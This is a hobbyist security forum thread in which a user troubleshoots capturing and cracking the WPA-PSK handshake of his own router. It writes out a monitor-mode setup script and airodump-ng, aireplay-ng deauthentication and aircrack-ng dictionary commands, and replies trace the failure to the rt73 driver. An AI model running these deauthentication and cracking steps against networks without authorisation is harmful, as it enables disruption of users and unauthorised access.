Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: No PSK Handshake... ever! .... Plz help!

  1. #1
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default No PSK Handshake... ever! .... Plz help!

    I've done this many times before on different equipment, but now I've hit some kind of invisible brick wall that hopefully someone here will be able to see....

    (I'm subbing my real [valid] macs)

    Equipment:

    WRTG54G v5 () Router - WPA-PSK w/TKIP
    Firmware: DD-WRT v23 SP2 (09/15/06) micro
    Mac: AA:AA:AA:AA:AA:AA (will refer to as 'AA')

    HP Notebook - Connected Machine to WPA-PSK Network
    Winblows with ipw3945 A/B/G
    Mac: BB:BB:BB:BB:BB:BB (will refer to as 'BB')

    Sony UX280P - Attacking machine
    BT2 () has an internal ipw3945, but I'm using the WUSB54GC with the RTx2500 drivers... this card/driver is working 100%
    Mac: CC:CC:CC:CC:CC:CC (will refer to as 'CC')

    I'm trying to (obviously) capture the WPA-PSK handshake between AA and BB with CC. I have done the following in my numerous attempts, only to get aircrack to tell me that there is no valid WPA handshakes in my cap file.

    Step 1:

    I run a small shell script I wrote for the CC (WUSB54GC) card, which does this:

    #!/bin/sh
    modprobe rt2500
    modprobe rausb0
    ifconfig rausb0 down
    macchanger --mac CC:CC:CC:CC:CC:CC rausb0
    ifconfig rausb0 up
    iwpriv rausb0 forceprism 1
    iwpriv rausb0 rfmontx 1
    iwconfig rausb0 mode Monitor
    iwconfig

    After this I positively confirm that CC is in Monitor mode... I've even gone the unnecessary length a few times by running airmon-ng start 6 rausb0.

    Step 2:

    airodump-ng -c 6 -b BB:BB:BB:BB:BB:BB -w /root/psktest rausb0

    This gives me:

    CH 6 ][ BAT: 43 mins ][ Elapsed: 2 mins ][ 2007-08-08 22:37

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER

    AA:AA:AA:AA:AA:AA 79 100 1738 658 28 6 48 WPA TKIP PSK

    BSSID STATION PWR Lost Packets Probes

    AA:AA:AA:AA:AA:AA BB:BB:BB:BB:BB:BB 83 0 621 dd-wrt

    Everything is good as far as I can see thus far.

    Step 3:

    Deauth using:

    aireplay-ng -0 1 -a AA:AA:AA:AA:AA:AA -c BB:BB:BB:BB:BB:BB rausb0

    This successfully deauths BB.... I know this for sure, as I can audibly hear the annoying MSN messenger popup for unread emails I have yet to read in my inbox from 1996 after it becomes reassociated.

    *A quick note... I have tried damned near everything to get the handshake, including not associating BB with AA until after I had airodump-ng up and running in this identical setup.

    Step 4:

    aircrack-ng -w /root/all.lst -b AA:AA:AA:AA:AA:AA /root/psktest-01.cap

    Gives me: No valid WPA handshakes found.... every damn time!!! No matter how many times I deauth with aireplay or manually log off and on BB.

    For the love of God, Jahweh, Buddah, Tom Cruise, Satan, whomever.... could someone please shed some light on how to troubleshoot this...?
    dd if=/dev/swc666 of=/dev/wyze

  2. #2
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    the pb is that you use wrong driver

    rt73 is known to not be able to capture well handshakes with native driver or rt25xx driver

    YOU MUST USE the last driver from aspj, 1.1.0

    * NEW: ToDS packets aren't dropped by the driver anymore. WPA handshake captures are finally possible!
    * NEW: Prism headers have been disabled (sorry...) because they seem to cause a lot of troubles.

    http://homepages.tu-darmstadt.de/~p_...-1.1.0.tar.bz2

    that's all
    i will post a module tonight....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  3. #3
    Junior Member
    Join Date
    Jul 2007
    Posts
    30

    Default

    This is brilliant. I have the exact same hardware; the WRTG54G v5 () Router - WPA-PSK w/TKIP with Firmware: DD-WRT v23 SP2 (09/15/06) micro and a usb wireless adapter running rt73 legacy drivers. I was having troubles last nite trying to capture the handshake, even though I could see it in wireshack, and this is the reason why! I look forward to your module -=Ze Frenchie=-

  4. #4
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    ftp://ftp.berlios.de/pub/svair/rt73-ASPJ-1.1.0.tgz

    just need to tgz2lzm it

    for install type :

    lzm2dir rt73-ASPJ-1.1.0.tgz /

    or extract tgz on /
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  5. #5
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    I just put a very basic WPA/WPA2 cracking video in the tutorial section. It may help you.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  6. #6
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    Thank you Shaman....

    Still no luck. I'm going to see what the serial monkeys have to say about this issue...
    dd if=/dev/swc666 of=/dev/wyze

  7. #7
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default S U C C E S S ! ! ! : ) : ) : )

    FINALLY!!!!!!!!!!!!!!!!!!!!!!

    Shaman, you lead me down the right road with the driver pb.....

    I was FINALLY able to successfully capture the handshake and crack my key with the hourly tarball (rt73-CVS)... I might actually get to bed before the sunrises now that I've solved the problem!!!
    dd if=/dev/swc666 of=/dev/wyze

  8. #8
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by swc666 View Post
    Shaman, you lead me down the right road with the driver pb.....
    He gets something right now and then...
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  9. #9
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    Shaman, you lead me down the right road with the driver pb.....

    He gets something right now and then...


    sorry, but my english have limits, scw666 what the hell your sentence means in simple words ?

    prez, i neither understand, what did i get ???? and then what ?????


    sorry but im french so if you can explain simply please lol....
    sorry again....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  10. #10
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by shamanvirtuel View Post
    Shaman, you lead me down the right road with the driver pb.....

    He gets something right now and then...


    sorry, but my english have limits, scw666 what the hell your sentence means in simple words ?

    prez, i neither understand, what did i get ???? and then what ?????


    sorry but im french so if you can explain simply please lol....
    sorry again....
    "Shaman, you lead me down the right road with the driver pb....." He is acknowledging that you pointed him in the correct direction.

    "He gets something right now and then..." I was joking that occasionally you actually give someone the right answer.

    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •